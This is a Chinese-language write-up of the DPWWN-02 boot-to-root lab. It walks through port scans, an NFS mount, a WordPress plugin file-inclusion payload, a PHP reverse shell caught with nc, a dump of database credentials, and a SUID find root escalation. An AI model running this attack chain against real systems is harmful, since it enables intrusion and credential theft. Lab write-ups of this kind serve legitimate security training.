DPWWN_2 靶机

信息收集

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 10.10.10.10                    
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-28 22:59 EDT
Nmap scan report for 10.10.10.10
Host is up (0.00053s latency).
Not shown: 65527 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
443/tcp   open  https
2049/tcp  open  nfs
40933/tcp open  unknown
42973/tcp open  unknown
44923/tcp open  unknown
48347/tcp open  unknown
MAC Address: 00:0C:29:61:24:B2 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 7.87 seconds

┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap --top-ports 20 -sU 10.10.10.10                     
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-28 23:27 EDT
Nmap scan report for 10.10.10.10
Host is up (0.00032s latency).

PORT      STATE  SERVICE
53/udp    closed domain
67/udp    closed dhcps
68/udp    closed dhcpc
69/udp    closed tftp
123/udp   closed ntp
135/udp   closed msrpc
137/udp   closed netbios-ns
138/udp   closed netbios-dgm
139/udp   closed netbios-ssn
161/udp   closed snmp
162/udp   closed snmptrap
445/udp   closed microsoft-ds
500/udp   closed isakmp
514/udp   closed syslog
520/udp   closed route
631/udp   closed ipp
1434/udp  closed ms-sql-m
1900/udp  closed upnp
4500/udp  closed nat-t-ike
49152/udp closed unknown
MAC Address: 00:0C:29:61:24:B2 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 23.63 seconds

开放了 80,111,443,2049,40933,42973,44923,48347 端口，没有 22 端口

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p80,111,443,2049,40933,42973,44923,48347 10.10.10.10   
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-28 23:01 EDT
Nmap scan report for 10.10.10.10
Host is up (0.00038s latency).

PORT      STATE SERVICE  VERSION
80/tcp    open  http     Apache httpd 2.4.38 ((Ubuntu))
|_http-title: dpwwn-02
|_http-server-header: Apache/2.4.38 (Ubuntu)
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      34176/udp   mountd
|   100005  1,2,3      34527/udp6  mountd
|   100005  1,2,3      42973/tcp   mountd
|   100005  1,2,3      59857/tcp6  mountd
|   100021  1,3,4      37005/tcp6  nlockmgr
|   100021  1,3,4      40564/udp6  nlockmgr
|   100021  1,3,4      40933/tcp   nlockmgr
|   100021  1,3,4      41906/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
443/tcp   open  http     Apache httpd 2.4.38 ((Ubuntu))
|_http-title: dpwwn-02
|_http-server-header: Apache/2.4.38 (Ubuntu)
2049/tcp  open  nfs      3-4 (RPC #100003)
40933/tcp open  nlockmgr 1-4 (RPC #100021)
42973/tcp open  mountd   1-3 (RPC #100005)
44923/tcp open  mountd   1-3 (RPC #100005)
48347/tcp open  mountd   1-3 (RPC #100005)
MAC Address: 00:0C:29:61:24:B2 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.37 seconds

五位数的端口都是 rpc 调用的，重点放在 80，443，2049

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p80,111,443,2049,40933,42973,44923,48347 10.10.10.10
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-28 23:26 EDT
Nmap scan report for 10.10.10.10
Host is up (0.00044s latency).

PORT      STATE SERVICE
80/tcp    open  http
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum: 
|   /wordpress/: Blog
|_  /wordpress/wp-login.php: Wordpress login page.
111/tcp   open  rpcbind
443/tcp   open  https
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
|_ssl-ccs-injection: No reply from server (TIMEOUT)
| http-enum: 
|   /wordpress/: Blog
|_  /wordpress/wp-login.php: Wordpress login page.
2049/tcp  open  nfs
40933/tcp open  unknown
42973/tcp open  unknown
44923/tcp open  unknown
48347/tcp open  unknown
MAC Address: 00:0C:29:61:24:B2 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 82.97 seconds

漏洞脚本的扫描结果中显示了 /wordpress/ 目录，而且 80 端口和 443 端口的扫描结果是相同的，猜测两个端口提供的 Web 服务是相同的。先来挂载一下 nfs，再用 wpscan 扫描一下

nfs 挂载

┌──(kali㉿kali)-[~]
└─$ showmount -e 10.10.10.10                                                      
Export list for 10.10.10.10:
/home/dpwwn02 (everyone)

┌──(kali㉿kali)-[~]
└─$ mkdir /tmp/infosec

┌──(kali㉿kali)-[~]
└─$ sudo mount -t nfs 10.10.10.10:/home/dpwwn02 /tmp/infosec

挂载成功，进去看看

┌──(kali㉿kali)-[/tmp/infosec]
└─$ ls -liah                                                   
total 16K
 405869 drwxr-xr-x  2 nobody nogroup 4.0K Aug  8  2019 .
4194305 drwxrwxrwt 17 root   root     12K Jun 28 23:05 ..

空空如也？先搁置吧，想到了之前可以在家目录下写 .ssh 文件然后放公钥的情况。不过这个没开放 22 端口。不管了， wpscan 看看吧

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://10.10.10.10/wordpress -eap                                                       
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` |  _ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.24
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://10.10.10.10/wordpress/ [10.10.10.10]
[+] Started: Thu Jun 29 01:45:09 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.10.10/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.10.10/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.10.10/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.10.10/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.10.10/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>
 |  - http://10.10.10.10/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.2</generator>

[+] WordPress theme in use: twentynineteen
 | Location: http://10.10.10.10/wordpress/wp-content/themes/twentynineteen/
 | Last Updated: 2023-03-29T00:00:00.000Z
 | Readme: http://10.10.10.10/wordpress/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 2.5
 | Style URL: http://10.10.10.10/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.10.10/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] site-editor
 | Location: http://10.10.10.10/wordpress/wp-content/plugins/site-editor/
 | Latest Version: 1.1.1 (up to date)
 | Last Updated: 2017-05-02T23:34:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.1.1 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.10.10/wordpress/wp-content/plugins/site-editor/readme.txt

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Jun 29 01:45:14 2023
[+] Requests Done: 33
[+] Cached Requests: 5
[+] Data Sent: 8.53 KB
[+] Data Received: 484.481 KB
[+] Memory used: 241.328 MB
[+] Elapsed time: 00:00:04

插件中有个 site-editor，搜索 wordpress site-editor，在 exploit db 中搜到了一个本地文件包含漏洞

http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

本地文件包含

尝试利用上述 PoC 进行验证

接下来我尝试访问 wp-config.php ，但似乎 php 文件会被解析，所以返回错误

接下来我尝试直接爆破登录，以及搜索 wordpress 5.2 和 wordpress 5.2.2 的漏洞，爆破了十几分钟都没成功，感觉直接爆破可能并不能拿到密码。这里想了很久，看了眼 WP 才意识到只需要在 nfs 挂载的目录中写入 php 文件，然后本地文件包含去访问就行了，过去打靶偏向于单一漏洞去 getshell，这次也是个提醒，要注意不同漏洞或者访问的联动性，getshell 是一个综合的过程

┌──(kali㉿kali)-[~/Downloads/dpwwn02]
└─$ vim php-reverse-shell.php

修改一下 reverse-shell 然后将其拷贝到挂载的目录下

┌──(root㉿kali)-[/tmp/infosec]
└─# cp /home/kali/Downloads/dpwwn02/php-reverse-shell.php ./

┌──(root㉿kali)-[/tmp/infosec]
└─# ls
php-reverse-shell.php

┌──(root㉿kali)-[/tmp/infosec]
└─# ls -liah                                                
total 20K
 405869 drwxr-xr-x  2 nobody nogroup 4.0K Jun 29 03:25 .
4194305 drwxrwxrwt 18 root   root     12K Jun 29 03:09 ..
 407201 -rwxr-xr-x  1 nobody nogroup 3.4K Jun 29 03:25 php-reverse-shell.php

本地文件包含+文件上传getshell

提前开启监听，通过本地文件包含漏洞去访问，getshell 成功

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 443                                                            
[sudo] password for kali: 
listening on [any] 443 ...
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.10] 50768
Linux dpwwn-02 5.0.0-23-generic #24-Ubuntu SMP Mon Jul 29 15:36:44 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 07:26:38 up  4:31,  0 users,  load average: 1.51, 14.28, 13.10
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can\'t access tty; job control turned off
$ whoami
www-data
$ uname -a
Linux dpwwn-02 5.0.0-23-generic #24-Ubuntu SMP Mon Jul 29 15:36:44 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:61:24:b2 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.10/24 brd 10.10.10.255 scope global ens33
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fe61:24b2/64 scope link 
       valid_lft forever preferred_lft forever
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@dpwwn-02:/$ export TERM=xterm-color

提权

wp-config 文件

去看看 wp-config 文件

www-data@dpwwn-02:/$ cd /var/www
cd /var/www
www-data@dpwwn-02:/var/www$ ls -liah
ls -liah
total 12K
268303 drwxr-xr-x  3 root root 4.0K Aug  7  2019 .
 16386 drwxr-xr-x 14 root root 4.0K Aug  7  2019 ..
268305 drwxr-xr-x  3 root root 4.0K Aug  8  2019 html
www-data@dpwwn-02:/var/www$ cd html
cd html
www-data@dpwwn-02:/var/www/html$ ls -liah
ls -liah
total 28K
268305 drwxr-xr-x 3 root     root     4.0K Aug  8  2019 .
268303 drwxr-xr-x 3 root     root     4.0K Aug  7  2019 ..
268311 -r-------- 1 root     root      11K Aug  7  2019 index.html
281706 -rw-r--r-- 1 root     root      184 Aug  8  2019 index.php
268687 drwxr-xr-x 5 www-data www-data 4.0K Aug  7  2019 wordpress
www-data@dpwwn-02:/var/www/html$ cd wordpress
cd wordpress
www-data@dpwwn-02:/var/www/html/wordpress$ ls -alih
ls -alih
total 216K
268687 drwxr-xr-x  5 www-data www-data 4.0K Aug  7  2019 .
268305 drwxr-xr-x  3 root     root     4.0K Aug  8  2019 ..
280668 -rwxr-xr-x  1 www-data www-data  256 Aug  7  2019 .htaccess
268703 -rwxr-xr-x  1 www-data www-data  420 Nov 30  2017 index.php
269532 -rwxr-xr-x  1 www-data www-data  20K Jan  1  2019 license.txt
268699 -rwxr-xr-x  1 www-data www-data 7.3K Apr  8  2019 readme.html
269761 -rwxr-xr-x  1 www-data www-data 6.8K Jan 12  2019 wp-activate.php
269762 drwxr-xr-x  9 www-data www-data 4.0K Jun 18  2019 wp-admin
268697 -rwxr-xr-x  1 www-data www-data  369 Nov 30  2017 wp-blog-header.php
280653 -rwxr-xr-x  1 www-data www-data 2.3K Jan 21  2019 wp-comments-post.php
268707 -rwxr-xr-x  1 www-data www-data 2.9K Jan  8  2019 wp-config-sample.php
280667 -rwxr-xr-x  1 www-data www-data 3.2K Aug  7  2019 wp-config.php
269533 drwxr-xr-x  6 www-data www-data 4.0K Jun 29 07:16 wp-content
268705 -rwxr-xr-x  1 www-data www-data 3.8K Jan  9  2019 wp-cron.php
533945 drwxr-xr-x 20 www-data www-data  12K Jun 18  2019 wp-includes
269759 -rwxr-xr-x  1 www-data www-data 2.5K Jan 16  2019 wp-links-opml.php
269760 -rwxr-xr-x  1 www-data www-data 3.3K Nov 30  2017 wp-load.php
268709 -rwxr-xr-x  1 www-data www-data  39K Jun 10  2019 wp-login.php
269758 -rwxr-xr-x  1 www-data www-data 8.3K Nov 30  2017 wp-mail.php
269505 -rwxr-xr-x  1 www-data www-data  19K Mar 28  2019 wp-settings.php
268701 -rwxr-xr-x  1 www-data www-data  31K Jan 16  2019 wp-signup.php
280652 -rwxr-xr-x  1 www-data www-data 4.7K Nov 30  2017 wp-trackback.php
268693 -rwxr-xr-x  1 www-data www-data 3.0K Aug 17  2018 xmlrpc.php
www-data@dpwwn-02:/var/www/html/wordpress$ cat wp-config.php
cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don\'t have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'dpwwn02' );

/** MySQL database username */
define( 'DB_USER', 'wpuser' );

/** MySQL database password */
define( 'DB_PASSWORD', 'wp$%bd(*&u$)rJmKa' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don\'t change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'tppc%]*HG>YdA%WexT&5+03</`+<ddzoOFNt/`^c@4N5<f;++(3(7+gb(}3W1^je' );
define( 'SECURE_AUTH_KEY',  '7B:6=Yxs+?;>,Nzo0RzUC_0H9@+Afbr+w~k<;m#IiqkzMzz[iac7[>=SfSN+Kf+K' );
define( 'LOGGED_IN_KEY',    '8]UL$#O2owarV?r7{v!#]YJeJVh]thhdp_U)QQRJcs%JhR}#vo(7*(9bJ~K%WYzY' );
define( 'NONCE_KEY',        '<Q3xN0jUeAS|>lM9qroI0H^([L]oJVG7c+%r`qH)oq:hwh+&dP,xQ4[H_xr(]VBY' );
define( 'AUTH_SALT',        '}n57d s@&5*~WiN|`&wv&uMs9(REUg>n!(2mC}0r[#NW{O=[E&Ml0tmc!{1uCk~+' );
define( 'SECURE_AUTH_SALT', 'P(|TAVr[ p1@<bfV50SSL13Dof`Fj+ZyF#<:Ppu[(,{hv1q<@#tXMJ-KawIg~Voy' );
define( 'LOGGED_IN_SALT',   '8c *i~o;jB,[YmV4WligV}zE@1G5XHNR@m{U.#j TQgIUA)Mi_fc+js5O@%IWd}f' );
define( 'NONCE_SALT',       'K_b9JPi0B$HAj!Uig}Mu[![kC.W!]c%3>JE*=})kRN*AK%qjcSTfy|xu.N|;AzAJ' );

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define( 'WP_DEBUG', false );

/* That\'s all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', dirname( __FILE__ ) . '/' );
}

/** Sets up WordPress vars and included files. */
require_once( ABSPATH . 'wp-settings.php' );
@ini_set('upload_max_size' , '256M' );

拿到了一个密码 wp$%bd(*&u$)rJmKa，数据库用户名是 wpuser，进数据库看看

www-data@dpwwn-02:/var/www/html/wordpress$ mysql -u wpuser -p
mysql -u wpuser -p
Enter password: wp$%bd(*&u$)rJmKa

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 219596
Server version: 5.7.27-0ubuntu0.19.04.1 (Ubuntu)

Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dpwwn02            |
+--------------------+
2 rows in set (0.00 sec)

mysql> use dpwwn02
use dpwwn02
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-----------------------+
| Tables_in_dpwwn02     |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.00 sec)

mysql> select * from wp_users;
select * from wp_users;
+----+------------+------------------------------------+---------------+------------------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email             | user_url | user_registered     | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+------------------------+----------+---------------------+---------------------+-------------+--------------+
|  1 | admin      | $P$BPdPCvh2zdEdcnDqH7f9kpWjCeOYxm. | admin         | dpwwn-02@dpwwn-02.test |          | 2019-08-07 08:10:32 |                     |           0 | admin        |
+----+------------+------------------------------------+---------------+------------------------+----------+---------------------+---------------------+-------------+--------------+
1 row in set (0.00 sec)

数据库只有一个用户 admin 用户密码经过了 md5 哈希，在线网站查询失败

信息收集与定时任务查看

看看定时任务吧，之前文件包含的时候尝试过，这里直接贴图

信息收集一下，然后查看 s 权限的文件

www-data@dpwwn-02:/home$ cd rootadmin
cd rootadmin
www-data@dpwwn-02:/home/rootadmin$ ls -laih
ls -laih
total 52K
405523 drwxr-xr-x 4 rootadmin rootadmin 4.0K Aug  8  2019 .
393218 drwxr-xr-x 4 root      root      4.0K Aug  8  2019 ..
407110 -rw------- 1 root      root         6 Aug  8  2019 .bash_history
405525 -rw-r--r-- 1 rootadmin rootadmin  220 Apr  4  2019 .bash_logout
405524 -rw-r--r-- 1 rootadmin rootadmin 3.7K Apr  4  2019 .bashrc
531299 drwx------ 2 rootadmin rootadmin 4.0K Aug  7  2019 .cache
531301 drwx------ 3 rootadmin rootadmin 4.0K Aug  7  2019 .gnupg
407111 -rw------- 1 root      root         1 Aug  8  2019 .mysql_history
405526 -rw-r--r-- 1 rootadmin rootadmin  807 Apr  4  2019 .profile
405573 -rw-r--r-- 1 rootadmin rootadmin    1 Aug  8  2019 .sudo_as_admin_successful
407199 -rw------- 1 root      root       12K Aug  8  2019 .viminfo
www-data@dpwwn-02:/home/rootadmin$ cat .sudo_as_admin_successful
cat .sudo_as_admin_successful

www-data@dpwwn-02:/home/rootadmin$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
      656     36 -rwsr-xr-x   1 root     root        34896 Mar  5  2019 /usr/bin/fusermount
      839     64 -rwsr-xr-x   1 root     root        63736 Mar 22  2019 /usr/bin/passwd
      551     44 -rwsr-xr-x   1 root     root        44528 Mar 22  2019 /usr/bin/chsh
     1120     36 -rwsr-xr-x   1 root     root        34888 Feb 22  2019 /usr/bin/umount
      648    312 -rwsr-xr-x   1 root     root       315904 Feb 16  2019 /usr/bin/find
     1051    156 -rwsr-xr-x   1 root     root       157192 Feb 19  2019 /usr/bin/sudo
      792     48 -rwsr-xr-x   1 root     root        47184 Feb 22  2019 /usr/bin/mount
      479     56 -rwsr-sr-x   1 daemon   daemon      55560 Nov 12  2018 /usr/bin/at
      545     80 -rwsr-xr-x   1 root     root        80592 Mar 22  2019 /usr/bin/chfn
     1050     64 -rwsr-xr-x   1 root     root        63568 Feb 22  2019 /usr/bin/su
      807     44 -rwsr-xr-x   1 root     root        44440 Mar 22  2019 /usr/bin/newgrp
      666     84 -rwsr-xr-x   1 root     root        84016 Mar 22  2019 /usr/bin/gpasswd
     7517    108 -rwsr-sr-x   1 root     root       109432 Mar 21  2019 /usr/lib/snapd/snap-confine
     1335     12 -rwsr-xr-x   1 root     root        10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
     1548    428 -rwsr-xr-x   1 root     root       436552 Apr  8  2019 /usr/lib/openssh/ssh-keysign
     4238     52 -rwsr-xr--   1 root     messagebus    51184 Jun 10  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    12428    120 -rwsr-xr-x   1 root     root         121528 Apr  1  2019 /usr/sbin/mount.nfs
       66     40 -rwsr-xr-x   1 root     root          40152 May 16  2018 /snap/core/6673/bin/mount
       80     44 -rwsr-xr-x   1 root     root          44168 May  7  2014 /snap/core/6673/bin/ping
       81     44 -rwsr-xr-x   1 root     root          44680 May  7  2014 /snap/core/6673/bin/ping6
       98     40 -rwsr-xr-x   1 root     root          40128 May 17  2017 /snap/core/6673/bin/su
      116     27 -rwsr-xr-x   1 root     root          27608 May 16  2018 /snap/core/6673/bin/umount
     2657     71 -rwsr-xr-x   1 root     root          71824 May 17  2017 /snap/core/6673/usr/bin/chfn
     2659     40 -rwsr-xr-x   1 root     root          40432 May 17  2017 /snap/core/6673/usr/bin/chsh
     2735     74 -rwsr-xr-x   1 root     root          75304 May 17  2017 /snap/core/6673/usr/bin/gpasswd
     2827     39 -rwsr-xr-x   1 root     root          39904 May 17  2017 /snap/core/6673/usr/bin/newgrp
     2840     53 -rwsr-xr-x   1 root     root          54256 May 17  2017 /snap/core/6673/usr/bin/passwd
     2950    134 -rwsr-xr-x   1 root     root         136808 Jul  4  2017 /snap/core/6673/usr/bin/sudo
     3049     42 -rwsr-xr--   1 root     systemd-network    42992 Jan 12  2017 /snap/core/6673/usr/lib/dbus-1.0/dbus-daemon-launch-helper
     3419    419 -rwsr-xr-x   1 root     root              428240 Mar  4  2019 /snap/core/6673/usr/lib/openssh/ssh-keysign
     6449     97 -rwsr-sr-x   1 root     root               98472 Mar 21  2019 /snap/core/6673/usr/lib/snapd/snap-confine
     7619    386 -rwsr-xr--   1 root     dip               394984 Jun 12  2018 /snap/core/6673/usr/sbin/pppd
       66     40 -rwsr-xr-x   1 root     root               40152 May 15  2019 /snap/core/7270/bin/mount
       80     44 -rwsr-xr-x   1 root     root               44168 May  7  2014 /snap/core/7270/bin/ping
       81     44 -rwsr-xr-x   1 root     root               44680 May  7  2014 /snap/core/7270/bin/ping6
       98     40 -rwsr-xr-x   1 root     root               40128 Mar 25  2019 /snap/core/7270/bin/su
      116     27 -rwsr-xr-x   1 root     root               27608 May 15  2019 /snap/core/7270/bin/umount
     2657     71 -rwsr-xr-x   1 root     root               71824 Mar 25  2019 /snap/core/7270/usr/bin/chfn
     2659     40 -rwsr-xr-x   1 root     root               40432 Mar 25  2019 /snap/core/7270/usr/bin/chsh
     2735     74 -rwsr-xr-x   1 root     root               75304 Mar 25  2019 /snap/core/7270/usr/bin/gpasswd
     2827     39 -rwsr-xr-x   1 root     root               39904 Mar 25  2019 /snap/core/7270/usr/bin/newgrp
     2840     53 -rwsr-xr-x   1 root     root               54256 Mar 25  2019 /snap/core/7270/usr/bin/passwd
     2950    134 -rwsr-xr-x   1 root     root              136808 Jun 10  2019 /snap/core/7270/usr/bin/sudo
     3049     42 -rwsr-xr--   1 root     systemd-network    42992 Jun 10  2019 /snap/core/7270/usr/lib/dbus-1.0/dbus-daemon-launch-helper
     3419    419 -rwsr-xr-x   1 root     root              428240 Mar  4  2019 /snap/core/7270/usr/lib/openssh/ssh-keysign
     6452    101 -rwsr-sr-x   1 root     root              102600 Jun 21  2019 /snap/core/7270/usr/lib/snapd/snap-confine
     7622    386 -rwsr-xr--   1 root     dip               394984 Jun 12  2018 /snap/core/7270/usr/sbin/pppd

find SUID

竟然看到了 find 文件，那就直接使用 gtf 找 exp 吧

www-data@dpwwn-02:/home/rootadmin$ cd /tmp
cd /tmp
www-data@dpwwn-02:/tmp$ find . -exec /bin/sh -p \; -quit              
find . -exec /bin/sh -p \; -quit
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
# whoami
whoami
root
# cd /root
cd /root
# ls
ls
dpwwn-02-FLAG.txt  snap
# cat dpwwn-02-FLAG.txt
cat dpwwn-02-FLAG.txt

Congratulation! You PWN this dpwwn-02. Hope you enjoy this boot to root CTF.
Thank you. 

46617323 
24337873 
4b4d6f6f 
72643234 
40323564 
4e443462 
36312a23 
26724a6d